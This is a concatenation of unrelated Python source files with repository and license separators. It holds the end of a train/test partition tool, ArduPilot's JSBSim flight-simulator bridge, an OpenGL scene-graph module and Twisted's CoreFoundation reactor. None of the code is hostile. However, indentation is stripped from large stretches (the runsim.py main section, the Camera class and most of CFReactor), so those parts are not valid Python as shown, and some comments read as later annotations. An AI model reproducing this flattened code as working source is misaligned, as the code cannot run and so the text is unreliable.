                              segment_size=config.segment_size,
                              file_based=by_file,
                              preserve_labels=True,
                              seed=seed)
    all_labels = [segment_info[i].max_label() for i in partition.train]
    if cv_iterations > 0 :
        skf = StratifiedKFold(all_labels, n_folds=cv_iterations)
        cross_validation = [TrainTestPartition([partition.train[i] for i in train_index],
                                               [partition.train[i] for i in test_index], None)
                            for train_index, test_index in skf]
    else :
        cross_validation = None
    # Each learning trial deliberately uses seed=None so trials differ.
    learning_trials = [PartitionData(segment_info,
                                     config.learning_split,
                                     avoid_overlap=True,
                                     segment_size=config.segment_size,
                                     file_based=by_file,
                                     preserve_labels=True,
                                     seed=None) for _ in range(config.learning_iterations)]
    return TrainTestPartitions(config, segment_info, cross_validation, learning_trials)
if __name__ == "__main__" :
    # Command-line driver: load a Segments JSON file, generate the train/test
    # partitions (plus CV folds), and write them back out as JSON.
    parser = argparse.ArgumentParser("Tool to generate train / test splits for testing and cross validation")
    parser.add_argument("--segments", "-i")
    parser.add_argument("--outfile", "-o")
    parser.add_argument("--learning-split", "-s", type=float)
    parser.add_argument("--learning-iterations", "-I", type=int)
    parser.add_argument("--cv-iterations", "-v", default=5, type=int)
    parser.add_argument("--seed", "-S")
    args = parser.parse_args(sys.argv[1:])
    segments_json = load_data(args.segments, 'segments', None, None, sys.argv[0] + " : ")
    if segments_json == None :
        print "Could not load Segments from %s" % (args.segments,)
        sys.exit(1)
    segment_info = [SegmentInfo.fromJSONDict(s) for s in segments_json['segments']]
    config = Configuration.fromJSONDict(segments_json['config'])
    # Command-line options override the values stored in the segments file.
    if args.learning_split != None :
        config.learning_split = args.learning_split
    if args.learning_iterations != None :
        config.learning_iterations = args.learning_iterations
    output = generate_partitions(config, segment_info, cv_iterations=args.cv_iterations, seed=args.seed)
    # Fall back to the canonical partition filename derived from the config.
    if args.outfile == None :
        args.outfile = TrainTestPartitions.get_partition_filename(config)
    print "Writing %s" % (args.outfile,)
    save_data(args.outfile, output.toJSONDict())
| gpl-3.0 |
AeroDragon/ArduCopter | Tools/autotest/jsbsim/runsim.py | 32 | 11496 | #!/usr/bin/env python
# run a jsbsim model as a child process
import sys, os, pexpect, socket
import math, time, select, struct, signal, errno
sys.path.insert(0, os.path.join(os.path.dirname(os.path.realpath(__file__)), '..', 'pysim'))
import util, atexit, fdpexpect
from pymavlink import fgFDM
class control_state(object):
    """Record of the control inputs most recently pushed to JSBSim, plus the
    terrain height at the home location.
    """
    def __init__(self):
        # Normalised control positions, all initially centred/idle.
        self.aileron = 0
        self.elevator = 0
        self.rudder = 0
        self.throttle = 0
        # Ground height (metres) at the home point, set by setup_template().
        self.ground_height = 0
sitl_state = control_state()
def interpret_address(addrstr):
    '''Parse an "IP:port" string into a (host, port) tuple with an int port.'''
    parts = addrstr.split(':')
    parts[1] = int(parts[1])
    return tuple(parts)
def jsb_set(variable, value):
    '''Send a "set" command for one property to the JSBSim console.'''
    global jsb_console
    command = 'set %s %s\r\n' % (variable, value)
    jsb_console.send(command)
def setup_template(home):
    '''Instantiate the JSBSim XML templates (reset, fgout, console) from the
    home location and the SITL output port.'''
    global opts
    # home is "lat,lng,alt,hdg" exactly as passed on the command line.
    v = home.split(',')
    if len(v) != 4:
        print("home should be lat,lng,alt,hdg - '%s'" % home)
        sys.exit(1)
    latitude = float(v[0])
    longitude = float(v[1])
    altitude = float(v[2])
    heading = float(v[3])
    # Remember the terrain height so process_jsb_input can convert AGL->ASL.
    sitl_state.ground_height = altitude
    # 1) reset.xml: initial position/heading for the Rascal model.
    template = os.path.join('aircraft', 'Rascal', 'reset_template.xml')
    reset = os.path.join('aircraft', 'Rascal', 'reset.xml')
    xml = open(template).read() % { 'LATITUDE' : str(latitude),
                                    'LONGITUDE' : str(longitude),
                                    'HEADING' : str(heading) }
    open(reset, mode='w').write(xml)
    print("Wrote %s" % reset)
    # Derived ports are offsets from the SITL output port (--simout).
    baseport = int(opts.simout.split(':')[1])
    # 2) fgout.xml: where JSBSim streams FG FDM packets (baseport+3).
    template = os.path.join('jsbsim', 'fgout_template.xml')
    out = os.path.join('jsbsim', 'fgout.xml')
    xml = open(template).read() % { 'FGOUTPORT' : str(baseport+3) }
    open(out, mode='w').write(xml)
    print("Wrote %s" % out)
    # 3) rascal_test.xml: script with the console port (baseport+4).
    template = os.path.join('jsbsim', 'rascal_test_template.xml')
    out = os.path.join('jsbsim', 'rascal_test.xml')
    xml = open(template).read() % { 'JSBCONSOLEPORT' : str(baseport+4) }
    open(out, mode='w').write(xml)
    print("Wrote %s" % out)
def process_sitl_input(buf):
    '''Apply one control packet from the SITL sim to JSBSim and the wind model.'''
    # Packet is 14 little-endian uint16s: 11 PWM channels + wind triple.
    control = list(struct.unpack('<14H', buf))
    pwm = control[:11]
    (speed, direction, turbulance) = control[11:]
    # Wind values are sent scaled by 100 to fit in a uint16.
    global wind
    wind.speed = speed*0.01
    wind.direction = direction*0.01
    wind.turbulance = turbulance*0.01
    # Map PWM microseconds to normalised commands: surfaces 1000-2000 -> -1..1,
    # throttle 1000-2000 -> 0..1.
    aileron = (pwm[0]-1500)/500.0
    elevator = (pwm[1]-1500)/500.0
    throttle = (pwm[2]-1000)/1000.0
    rudder = (pwm[3]-1500)/500.0
    if opts.elevon:
        # fake an elevon plane
        ch1 = aileron
        ch2 = elevator
        aileron = (ch2-ch1)/2.0
        # the minus does away with the need for RC2_REV=-1
        elevator = -(ch2+ch1)/2.0
    if opts.vtail:
        # fake a vtail plane (mix elevator and rudder)
        ch1 = elevator
        ch2 = rudder
        # this matches VTAIL_OUTPUT==2
        elevator = (ch2-ch1)/2.0
        rudder = (ch2+ch1)/2.0
    # Only forward values that changed, to avoid flooding the JSBSim console.
    if aileron != sitl_state.aileron:
        jsb_set('fcs/aileron-cmd-norm', aileron)
        sitl_state.aileron = aileron
    if elevator != sitl_state.elevator:
        jsb_set('fcs/elevator-cmd-norm', elevator)
        sitl_state.elevator = elevator
    if rudder != sitl_state.rudder:
        jsb_set('fcs/rudder-cmd-norm', rudder)
        sitl_state.rudder = rudder
    if throttle != sitl_state.throttle:
        jsb_set('fcs/throttle-cmd-norm', throttle)
        sitl_state.throttle = throttle
def update_wind(wind):
    '''Push the current wind vector into the JSBSim atmosphere model.'''
    wind_speed, wind_dir = wind.current()
    jsb_set('atmosphere/psiw-rad', math.radians(wind_dir))
    # JSBSim expects wind magnitude in feet per second.
    jsb_set('atmosphere/wind-mag-fps', wind_speed/0.3048)
def process_jsb_input(buf):
    '''Parse one FG FDM packet from JSBSim, mirror it to FlightGear (if
    enabled) and forward a repacked state packet to the SITL sim.'''
    global fdm, fg_out, sim_out
    fdm.parse(buf)
    if fg_out:
        try:
            # Convert AGL to ASL using the home terrain height so the
            # FlightGear display sits at the right altitude.
            agl = fdm.get('agl', units='meters')
            fdm.set('altitude', agl+sitl_state.ground_height, units='meters')
            fdm.set('rpm', sitl_state.throttle*1000)
            fg_out.send(fdm.pack())
        except socket.error as e:
            # FlightGear not listening yet is fine; anything else is fatal.
            if e.errno not in [ errno.ECONNREFUSED ]:
                raise
    # 17 little-endian doubles of state followed by a uint32 frame marker.
    simbuf = struct.pack('<17dI',
                         fdm.get('latitude', units='degrees'),
                         fdm.get('longitude', units='degrees'),
                         fdm.get('altitude', units='meters'),
                         fdm.get('psi', units='degrees'),
                         fdm.get('v_north', units='mps'),
                         fdm.get('v_east', units='mps'),
                         fdm.get('v_down', units='mps'),
                         fdm.get('A_X_pilot', units='mpss'),
                         fdm.get('A_Y_pilot', units='mpss'),
                         fdm.get('A_Z_pilot', units='mpss'),
                         fdm.get('phidot', units='dps'),
                         fdm.get('thetadot', units='dps'),
                         fdm.get('psidot', units='dps'),
                         fdm.get('phi', units='degrees'),
                         fdm.get('theta', units='degrees'),
                         fdm.get('psi', units='degrees'),
                         fdm.get('vcas', units='mps'),
                         0x4c56414f)  # magic marker ("OAVL" little-endian) -- presumably checked by the SITL side; confirm
    try:
        sim_out.send(simbuf)
    except socket.error as e:
        if e.errno not in [ errno.ECONNREFUSED ]:
            raise
##################
# main program
from optparse import OptionParser
parser = OptionParser("runsim.py [options]")
parser.add_option("--simin", help="SITL input (IP:port)", default="127.0.0.1:5502")
parser.add_option("--simout", help="SITL output (IP:port)", default="127.0.0.1:5501")
parser.add_option("--fgout", help="FG display output (IP:port)", default="127.0.0.1:5503")
parser.add_option("--home", type='string', help="home lat,lng,alt,hdg (required)")
parser.add_option("--script", type='string', help='jsbsim model script', default='jsbsim/rascal_test.xml')
parser.add_option("--options", type='string', help='jsbsim startup options')
parser.add_option("--elevon", action='store_true', default=False, help='assume elevon input')
parser.add_option("--vtail", action='store_true', default=False, help='assume vtail input')
parser.add_option("--wind", dest="wind", help="Simulate wind (speed,direction,turbulance)", default='0,0,0')
(opts, args) = parser.parse_args()
for m in [ 'home', 'script' ]:
if not opts.__dict__[m]:
print("Missing required option '%s'" % m)
parser.print_help()
sys.exit(1)
os.chdir(util.reltopdir('Tools/autotest'))
# kill off child when we exit
atexit.register(util.pexpect_close_all)
setup_template(opts.home)
# start child
cmd = "JSBSim --realtime --suspend --nice --simulation-rate=1000 --logdirectivefile=jsbsim/fgout.xml --script=%s" % opts.script
if opts.options:
cmd += ' %s' % opts.options
jsb = pexpect.spawn(cmd, logfile=sys.stdout, timeout=10)
jsb.delaybeforesend = 0
util.pexpect_autoclose(jsb)
i = jsb.expect(["Successfully bound to socket for input on port (\d+)",
"Could not bind to socket for input"])
if i == 1:
print("Failed to start JSBSim - is another copy running?")
sys.exit(1)
jsb_out_address = interpret_address("127.0.0.1:%u" % int(jsb.match.group(1)))
jsb.expect("Creating UDP socket on port (\d+)")
jsb_in_address = interpret_address("127.0.0.1:%u" % int(jsb.match.group(1)))
jsb.expect("Successfully connected to socket for output")
jsb.expect("JSBSim Execution beginning")
# setup output to jsbsim
print("JSBSim console on %s" % str(jsb_out_address))
jsb_out = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
jsb_out.connect(jsb_out_address)
jsb_console = fdpexpect.fdspawn(jsb_out.fileno(), logfile=sys.stdout)
jsb_console.delaybeforesend = 0
# setup input from jsbsim
print("JSBSim FG FDM input on %s" % str(jsb_in_address))
jsb_in = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
jsb_in.bind(jsb_in_address)
jsb_in.setblocking(0)
# socket addresses
sim_out_address = interpret_address(opts.simout)
sim_in_address = interpret_address(opts.simin)
# setup input from SITL sim
sim_in = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sim_in.bind(sim_in_address)
sim_in.setblocking(0)
# setup output to SITL sim
sim_out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sim_out.connect(interpret_address(opts.simout))
sim_out.setblocking(0)
# setup possible output to FlightGear for display
fg_out = None
if opts.fgout:
fg_out = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
fg_out.connect(interpret_address(opts.fgout))
# setup wind generator
wind = util.Wind(opts.wind)
fdm = fgFDM.fgFDM()
jsb_console.send('info\n')
jsb_console.send('resume\n')
jsb.expect("trim computation time")
time.sleep(1.5)
jsb_console.logfile = None
print("Simulator ready to fly")
def main_loop():
    '''Run the bridge loop: shuttle packets between JSBSim and the SITL sim,
    pause JSBSim when SITL stops sending, update wind, and report FPS.'''
    tnow = time.time()
    last_report = tnow
    last_sim_input = tnow
    last_wind_update = tnow
    frame_count = 0
    paused = False
    while True:
        rin = [jsb_in.fileno(), sim_in.fileno(), jsb_console.fileno(), jsb.fileno()]
        try:
            (rin, win, xin) = select.select(rin, [], [], 1.0)
        except select.error:
            # select was interrupted (e.g. by a signal); make sure our parent
            # is still alive, then retry.
            util.check_parent()
            continue
        tnow = time.time()
        if jsb_in.fileno() in rin:
            buf = jsb_in.recv(fdm.packet_size())
            process_jsb_input(buf)
            frame_count += 1
        if sim_in.fileno() in rin:
            # 28 bytes == struct '<14H', the SITL control packet size.
            simbuf = sim_in.recv(28)
            process_sitl_input(simbuf)
            last_sim_input = tnow
        # show any jsbsim console output
        if jsb_console.fileno() in rin:
            util.pexpect_drain(jsb_console)
        if jsb.fileno() in rin:
            util.pexpect_drain(jsb)
        # Freeze JSBSim while SITL is silent so the physics don't run ahead.
        if tnow - last_sim_input > 0.2:
            if not paused:
                print("PAUSING SIMULATION")
                paused = True
                jsb_console.send('hold\n')
        else:
            if paused:
                print("RESUMING SIMULATION")
                paused = False
                jsb_console.send('resume\n')
        # NOTE(review): the original comment claimed wind is only simulated
        # above 5 metres, but there is no altitude check here -- wind is
        # pushed every 0.1 s unconditionally.
        if tnow - last_wind_update > 0.1:
            update_wind(wind)
            last_wind_update = tnow
        # Periodic status line with frame rate and key state values.
        if tnow - last_report > 3:
            print("FPS %u asl=%.1f agl=%.1f roll=%.1f pitch=%.1f a=(%.2f %.2f %.2f)" % (
                frame_count / (time.time() - last_report),
                fdm.get('altitude', units='meters'),
                fdm.get('agl', units='meters'),
                fdm.get('phi', units='degrees'),
                fdm.get('theta', units='degrees'),
                fdm.get('A_X_pilot', units='mpss'),
                fdm.get('A_Y_pilot', units='mpss'),
                fdm.get('A_Z_pilot', units='mpss')))
            frame_count = 0
            last_report = time.time()
def exit_handler():
    '''Tear down the simulation: kill JSBSim, close all pexpect children and
    exit. Safe to call from a signal handler.'''
    # Ignore further signals so a second Ctrl-C can't interrupt the cleanup.
    signal.signal(signal.SIGINT, signal.SIG_IGN)
    signal.signal(signal.SIGTERM, signal.SIG_IGN)
    # JSBSim really doesn't like to die ...
    if getattr(jsb, 'pid', None) is not None:
        try:
            os.kill(jsb.pid, signal.SIGKILL)
        except OSError:
            # BUGFIX: the child may already have exited, in which case
            # os.kill raises OSError (ESRCH); that used to abort the rest
            # of the cleanup (pexpect_close_all was never reached).
            pass
    jsb_console.send('quit\n')
    jsb.close(force=True)
    util.pexpect_close_all()
    sys.exit(1)
signal.signal(signal.SIGINT, exit_handler)
signal.signal(signal.SIGTERM, exit_handler)
try:
main_loop()
except:
exit_handler()
raise
| gpl-3.0 |
clems71/pogle | pogle/pogle_scene.py | 1 | 3346 | from pogle_math import Vector, Matrix4x4, Transform
__author__ = 'Clement JACOB'
__copyright__ = "Copyright 2013, The Python OpenGL Engine"
__license__ = "Closed Source"
__version__ = "0.0.1"
__email__ = "clems71@gmail.com"
__status__ = "Prototype"
class Light(object):
    """A light source positioned in world space."""

    def __init__(self, pos=None):
        """Create a light.

        pos -- world-space position of the light; defaults to the origin.
        """
        # BUGFIX: the default used to be pos=Vector(0.0, 0.0, 0.0), which is
        # evaluated once at class-definition time, so every Light created
        # without an explicit position shared the same Vector instance --
        # the exact pitfall SceneNode.__init__ in this file documents and
        # avoids with the None-sentinel pattern used here.
        if pos is None:
            pos = Vector(0.0, 0.0, 0.0)
        self.position = pos
class Camera(object):
def __init__(self, proj=None, view=None):
if proj is None:
proj = Matrix4x4()
self.proj = proj
if view is None:
view = Matrix4x4()
self.view = view
self._follow_viewport = False
def lookat(self, eye, center=Vector(0, 0, 0), up=Vector(0, 1, 0)):
self.view = Matrix4x4.lookat(eye, center, up)
@staticmethod
def perspective(fovy, near, far):
cam = Camera(Matrix4x4.perspective(fovy, 1.0, near, far))
cam._near = near
cam._fovy = fovy
cam._far = far
cam._follow_viewport = True
return cam
@staticmethod
def ortho(near, far, width, height):
return Camera(Matrix4x4.ortho(near, far, width, height))
class Scene(object):
    """ A scene is a container for all your objects.
    It holds the renderable nodes, the active camera, 0 to 3 directional
    lights, and the render passes that consume the node list.
    """
    def __init__(self, camera=None):
        """camera -- Camera to view the scene through; a default Camera is
        created when omitted."""
        if camera is None:
            camera = Camera()
        self.passes = []
        self.camera = camera
        self.lights = []
        self._nodes = []
    def register_pass(self, pass_):
        """Attach a render pass (must not already be registered)."""
        assert pass_ not in self.passes
        self.passes.append(pass_)
    def unregister_pass(self, pass_):
        """Detach a previously registered render pass."""
        assert pass_ in self.passes
        self.passes.remove(pass_)
    def add_node(self, node):
        """Attach a node to this scene and invalidate the render lists."""
        # `is None` rather than `== None`: identity check, immune to any
        # __eq__ a node's scene object might define.
        assert node.scene is None, 'The node is already attached to a scene'
        self._nodes.append(node)
        node.scene = self
        self.mark_renderlist_as_dirty()
    def mark_renderlist_as_dirty(self):
        """Tell every registered pass to rebuild its render list."""
        for p in self.passes:
            p.mark_renderlist_as_dirty()
    def remove_node(self, node):
        """Detach a node from this scene and invalidate the render lists."""
        assert node.scene is self, 'The node is not attached to this scene'
        self._nodes.remove(node)
        node.scene = None
        self.mark_renderlist_as_dirty()
    def add_light(self, light):
        """Add a light source to the scene."""
        self.lights.append(light)
    def get_nodes(self, flag):
        """Return the list of all nodes having the flag 'flag'.
        flag -- The flag that must be present on all nodes returned
        """
        return [n for n in self._nodes if n.has_flag(flag)]
    def get_nodes_i(self, flag):
        """Yield each node having the flag 'flag' (lazy variant of get_nodes).
        flag -- The flag that must be present on all nodes returned
        """
        for n in self._nodes:
            if n.has_flag(flag):
                yield n
    def __len__(self):
        return len(self._nodes)
    @property
    def nodes(self):
        """All nodes currently attached to the scene."""
        return self._nodes
class SceneNode(object):
    """Base class for every node that can be attached to a Scene."""

    NODE_HAS_GEOMETRY = 1  # bit flag: node carries renderable geometry

    def __init__(self, transform=None, flags=0x00000000):
        """Create a node with an optional local transform and flag bitmask.

        transform -- local Transform; a fresh one is created when omitted.
        flags -- bitmask of NODE_* capability flags.
        """
        self.name = ''
        self.flags = flags
        # Build the default Transform inside the body: a default argument of
        # Transform() would be evaluated once at class-definition time and
        # shared by every node created without an explicit transform.
        self.transform = Transform() if transform is None else transform
        self.scene = None

    def has_flag(self, flag):
        """Return True when *flag* is set in this node's flag bitmask."""
        return bool(self.flags & flag)
| mit |
Immortalin/python-for-android | python-modules/twisted/twisted/internet/cfreactor.py | 49 | 17464 | # -*- test-case-name: twisted.internet.test.test_core -*-
# Copyright (c) 2010 Twisted Matrix Laboratories
# See LICENSE for details.
"""
A reactor for integrating with U{CFRunLoop<http://bit.ly/cfrunloop>}, the
CoreFoundation main loop used by MacOS X.
This is useful for integrating Twisted with U{PyObjC<http://pyobjc.sf.net/>}
applications.
"""
__all__ = [
'install',
'CFReactor'
]
import sys
from zope.interface import implements
from twisted.internet.interfaces import IReactorFDSet
from twisted.internet.posixbase import PosixReactorBase, _Waker
from twisted.internet.selectreactor import _NO_FILENO, _NO_FILEDESC
from twisted.python import log
from CoreFoundation import (
CFRunLoopAddSource, CFRunLoopRemoveSource, CFRunLoopGetMain, CFRunLoopRun,
CFRunLoopStop, CFRunLoopTimerCreate, CFRunLoopAddTimer,
CFRunLoopTimerInvalidate, kCFAllocatorDefault, kCFRunLoopCommonModes,
CFAbsoluteTimeGetCurrent)
from CFNetwork import (
CFSocketCreateWithNative, CFSocketSetSocketFlags, CFSocketEnableCallBacks,
CFSocketCreateRunLoopSource, CFSocketDisableCallBacks, CFSocketInvalidate,
kCFSocketWriteCallBack, kCFSocketReadCallBack, kCFSocketConnectCallBack,
kCFSocketAutomaticallyReenableReadCallBack,
kCFSocketAutomaticallyReenableWriteCallBack)
_READ = 0
_WRITE = 1
_preserveSOError = 1 << 6
class _WakerPlus(_Waker):
    """
    The normal Twisted waker will simply wake up the main loop, which causes an
    iteration to run, which in turn causes L{PosixReactorBase.runUntilCurrent}
    to get invoked.
    L{CFReactor} has a slightly different model of iteration, though: rather
    than have each iteration process the thread queue, then timed calls, then
    file descriptors, each callback is run as it is dispatched by the CFRunLoop
    observer which triggered it.
    So this waker needs to not only unblock the loop, but also make sure the
    work gets done; so, it reschedules the invocation of C{runUntilCurrent} to
    be immediate (0 seconds from now) even if there is no timed call work to
    do.
    """
    def doRead(self):
        """
        Wake up the loop and force C{runUntilCurrent} to run immediately in the
        next timed iteration.
        """
        result = _Waker.doRead(self)
        # force=True schedules a 0-second CFRunLoopTimer so the queued work
        # actually runs, rather than merely unblocking the run loop.
        self.reactor._scheduleSimulate(True)
        return result
class CFReactor(PosixReactorBase):
"""
The CoreFoundation reactor.
You probably want to use this via the L{install} API.
@ivar _fdmap: a dictionary, mapping an integer (a file descriptor) to a
4-tuple of:
- source: a C{CFRunLoopSource}; the source associated with this
socket.
- socket: a C{CFSocket} wrapping the file descriptor.
- descriptor: an L{IReadDescriptor} and/or L{IWriteDescriptor}
provider.
- read-write: a 2-C{list} of booleans: respectively, whether this
descriptor is currently registered for reading or registered for
writing.
@ivar _idmap: a dictionary, mapping the id() of an L{IReadDescriptor} or
L{IWriteDescriptor} to a C{fd} in L{_fdmap}. Implemented in this
manner so that we don't have to rely (even more) on the hashability of
L{IReadDescriptor} providers, and we know that they won't be collected
since these are kept in sync with C{_fdmap}. Necessary because the
.fileno() of a file descriptor may change at will, so we need to be
able to look up what its file descriptor I{used} to be, so that we can
look it up in C{_fdmap}
@ivar _cfrunloop: the L{CFRunLoop} pyobjc object wrapped by this reactor.
@ivar _inCFLoop: Is L{CFRunLoopRun} currently running?
@type _inCFLoop: C{bool}
@ivar _currentSimulator: if a CFTimer is currently scheduled with the CF
run loop to run Twisted callLater calls, this is a reference to it.
Otherwise, it is C{None}
"""
implements(IReactorFDSet)
def __init__(self, runLoop=None, runner=None):
self._fdmap = {}
self._idmap = {}
if runner is None:
runner = CFRunLoopRun
self._runner = runner
if runLoop is None:
runLoop = CFRunLoopGetMain()
self._cfrunloop = runLoop
PosixReactorBase.__init__(self)
def installWaker(self):
"""
Override C{installWaker} in order to use L{_WakerPlus}; otherwise this
should be exactly the same as the parent implementation.
"""
if not self.waker:
self.waker = _WakerPlus(self)
self._internalReaders.add(self.waker)
self.addReader(self.waker)
def _socketCallback(self, cfSocket, callbackType,
ignoredAddress, ignoredData, context):
"""
The socket callback issued by CFRunLoop. This will issue C{doRead} or
C{doWrite} calls to the L{IReadDescriptor} and L{IWriteDescriptor}
registered with the file descriptor that we are being notified of.
@param cfSocket: The L{CFSocket} which has got some activity.
@param callbackType: The type of activity that we are being notified
of. Either L{kCFSocketReadCallBack} or L{kCFSocketWriteCallBack}.
@param ignoredAddress: Unused, because this is not used for either of
the callback types we register for.
@param ignoredData: Unused, because this is not used for either of the
callback types we register for.
@param context: The data associated with this callback by
L{CFSocketCreateWithNative} (in L{CFReactor._watchFD}). A 2-tuple
of C{(int, CFRunLoopSource)}.
"""
(fd, smugglesrc) = context
if fd not in self._fdmap:
# Spurious notifications seem to be generated sometimes if you
# CFSocketDisableCallBacks in the middle of an event. I don't know
# about this FD, any more, so let's get rid of it.
CFRunLoopRemoveSource(
self._cfrunloop, smugglesrc, kCFRunLoopCommonModes
)
return
try:
src, skt, readWriteDescriptor, rw = self._fdmap[fd]
why = None
isRead = callbackType == kCFSocketReadCallBack
try:
# CFSocket seems to deliver duplicate read/write notifications
# sometimes, especially a duplicate writability notification
# when first registering the socket. This bears further
# investigation, since I may have been mis-interpreting the
# behavior I was seeing. (Running the full Twisted test suite,
# while thorough, is not always entirely clear.) Until this has
# been more thoroughly investigated , we consult our own
# reading/writing state flags to determine whether we should
# actually attempt a doRead/doWrite first. -glyph
if isRead:
if rw[_READ]:
why = readWriteDescriptor.doRead()
else:
if rw[_WRITE]:
why = readWriteDescriptor.doWrite()
except:
why = sys.exc_info()[1]
log.err()
handfn = getattr(readWriteDescriptor, 'fileno', None)
if handfn is None:
why = _NO_FILENO
elif handfn() == -1:
why = _NO_FILEDESC
if why:
self._disconnectSelectable(readWriteDescriptor, why, isRead)
except:
log.err()
def _watchFD(self, fd, descr, flag):
"""
Register a file descriptor with the L{CFRunLoop}, or modify its state
so that it's listening for both notifications (read and write) rather
than just one; used to implement C{addReader} and C{addWriter}.
@param fd: The file descriptor.
@type fd: C{int}
@param descr: the L{IReadDescriptor} or L{IWriteDescriptor}
@param flag: the flag to register for callbacks on, either
L{kCFSocketReadCallBack} or L{kCFSocketWriteCallBack}
"""
if fd == -1:
raise RuntimeError("Invalid file descriptor.")
if fd in self._fdmap:
src, cfs, gotdescr, rw = self._fdmap[fd]
# do I need to verify that it's the same descr?
else:
ctx = []
ctx.append(fd)
cfs = CFSocketCreateWithNative(
kCFAllocatorDefault, fd,
kCFSocketReadCallBack | kCFSocketWriteCallBack |
kCFSocketConnectCallBack,
self._socketCallback, ctx
)
CFSocketSetSocketFlags(
cfs,
kCFSocketAutomaticallyReenableReadCallBack |
kCFSocketAutomaticallyReenableWriteCallBack |
# This extra flag is to ensure that CF doesn't (destructively,
# because destructively is the only way to do it) retrieve
# SO_ERROR and thereby break twisted.internet.tcp.BaseClient,
# which needs SO_ERROR to tell it whether or not it needs to
# call connect_ex a second time.
_preserveSOError
)
src = CFSocketCreateRunLoopSource(kCFAllocatorDefault, cfs, 0)
ctx.append(src)
CFRunLoopAddSource(self._cfrunloop, src, kCFRunLoopCommonModes)
CFSocketDisableCallBacks(
cfs,
kCFSocketReadCallBack | kCFSocketWriteCallBack |
kCFSocketConnectCallBack
)
rw = [False, False]
self._idmap[id(descr)] = fd
self._fdmap[fd] = src, cfs, descr, rw
rw[self._flag2idx(flag)] = True
CFSocketEnableCallBacks(cfs, flag)
def _flag2idx(self, flag):
"""
Convert a C{kCFSocket...} constant to an index into the read/write
state list (C{_READ} or C{_WRITE}) (the 4th element of the value of
C{self._fdmap}).
@param flag: C{kCFSocketReadCallBack} or C{kCFSocketWriteCallBack}
@return: C{_READ} or C{_WRITE}
"""
return {kCFSocketReadCallBack: _READ,
kCFSocketWriteCallBack: _WRITE}[flag]
def _unwatchFD(self, fd, descr, flag):
"""
Unregister a file descriptor with the L{CFRunLoop}, or modify its state
so that it's listening for only one notification (read or write) as
opposed to both; used to implement C{removeReader} and C{removeWriter}.
@param fd: a file descriptor
@type fd: C{int}
@param descr: an L{IReadDescriptor} or L{IWriteDescriptor}
@param flag: L{kCFSocketWriteCallBack} L{kCFSocketReadCallBack}
"""
if id(descr) not in self._idmap:
return
if fd == -1:
# need to deal with it in this case, I think.
realfd = self._idmap[id(descr)]
else:
realfd = fd
src, cfs, descr, rw = self._fdmap[realfd]
CFSocketDisableCallBacks(cfs, flag)
rw[self._flag2idx(flag)] = False
if not rw[_READ] and not rw[_WRITE]:
del self._idmap[id(descr)]
del self._fdmap[realfd]
CFRunLoopRemoveSource(self._cfrunloop, src, kCFRunLoopCommonModes)
CFSocketInvalidate(cfs)
def addReader(self, reader):
"""
Implement L{IReactorFDSet.addReader}.
"""
self._watchFD(reader.fileno(), reader, kCFSocketReadCallBack)
def addWriter(self, writer):
"""
Implement L{IReactorFDSet.addWriter}.
"""
self._watchFD(writer.fileno(), writer, kCFSocketWriteCallBack)
def removeReader(self, reader):
"""
Implement L{IReactorFDSet.removeReader}.
"""
self._unwatchFD(reader.fileno(), reader, kCFSocketReadCallBack)
def removeWriter(self, writer):
"""
Implement L{IReactorFDSet.removeWriter}.
"""
self._unwatchFD(writer.fileno(), writer, kCFSocketWriteCallBack)
def removeAll(self):
"""
Implement L{IReactorFDSet.removeAll}.
"""
allDesc = set([descr for src, cfs, descr, rw in self._fdmap.values()])
allDesc -= set(self._internalReaders)
for desc in allDesc:
self.removeReader(desc)
self.removeWriter(desc)
return list(allDesc)
def getReaders(self):
"""
Implement L{IReactorFDSet.getReaders}.
"""
return [descr for src, cfs, descr, rw in self._fdmap.values()
if rw[_READ]]
def getWriters(self):
"""
Implement L{IReactorFDSet.getWriters}.
"""
return [descr for src, cfs, descr, rw in self._fdmap.values()
if rw[_WRITE]]
def _moveCallLaterSooner(self, tple):
"""
Override L{PosixReactorBase}'s implementation of L{IDelayedCall.reset}
so that it will immediately reschedule. Normally
C{_moveCallLaterSooner} depends on the fact that C{runUntilCurrent} is
always run before the mainloop goes back to sleep, so this forces it to
immediately recompute how long the loop needs to stay asleep.
"""
result = PosixReactorBase._moveCallLaterSooner(self, tple)
self._scheduleSimulate()
return result
_inCFLoop = False
def mainLoop(self):
"""
Run the runner (L{CFRunLoopRun} or something that calls it), which runs
the run loop until C{crash()} is called.
"""
self._inCFLoop = True
try:
self._runner()
finally:
self._inCFLoop = False
_currentSimulator = None
def _scheduleSimulate(self, force=False):
"""
Schedule a call to C{self.runUntilCurrent}. This will cancel the
currently scheduled call if it is already scheduled.
@param force: Even if there are no timed calls, make sure that
C{runUntilCurrent} runs immediately (in a 0-seconds-from-now
{CFRunLoopTimer}). This is necessary for calls which need to
trigger behavior of C{runUntilCurrent} other than running timed
calls, such as draining the thread call queue or calling C{crash()}
when the appropriate flags are set.
@type force: C{bool}
"""
if self._currentSimulator is not None:
CFRunLoopTimerInvalidate(self._currentSimulator)
self._currentSimulator = None
timeout = self.timeout()
if force:
timeout = 0.0
if timeout is not None:
fireDate = (CFAbsoluteTimeGetCurrent() + timeout)
def simulate(cftimer, extra):
self._currentSimulator = None
self.runUntilCurrent()
self._scheduleSimulate()
c = self._currentSimulator = CFRunLoopTimerCreate(
kCFAllocatorDefault, fireDate,
0, 0, 0, simulate, None
)
CFRunLoopAddTimer(self._cfrunloop, c, kCFRunLoopCommonModes)
def callLater(self, _seconds, _f, *args, **kw):
"""
Implement L{IReactorTime.callLater}.
"""
delayedCall = PosixReactorBase.callLater(
self, _seconds, _f, *args, **kw
)
self._scheduleSimulate()
return delayedCall
def stop(self):
"""
Implement L{IReactorCore.stop}.
"""
PosixReactorBase.stop(self)
self._scheduleSimulate(True)
def crash(self):
"""
Implement L{IReactorCore.crash}
"""
wasStarted = self._started
PosixReactorBase.crash(self)
if self._inCFLoop:
self._stopNow()
else:
if wasStarted:
self.callLater(0, self._stopNow)
def _stopNow(self):
"""
Immediately stop the CFRunLoop (which must be running!).
"""
CFRunLoopStop(self._cfrunloop)
def iterate(self, delay=0):
"""
Emulate the behavior of C{iterate()} for things that want to call it,
by letting the loop run for a little while and then scheduling a timed
call to exit it.
"""
self.callLater(delay, self._stopNow)
self.mainLoop()
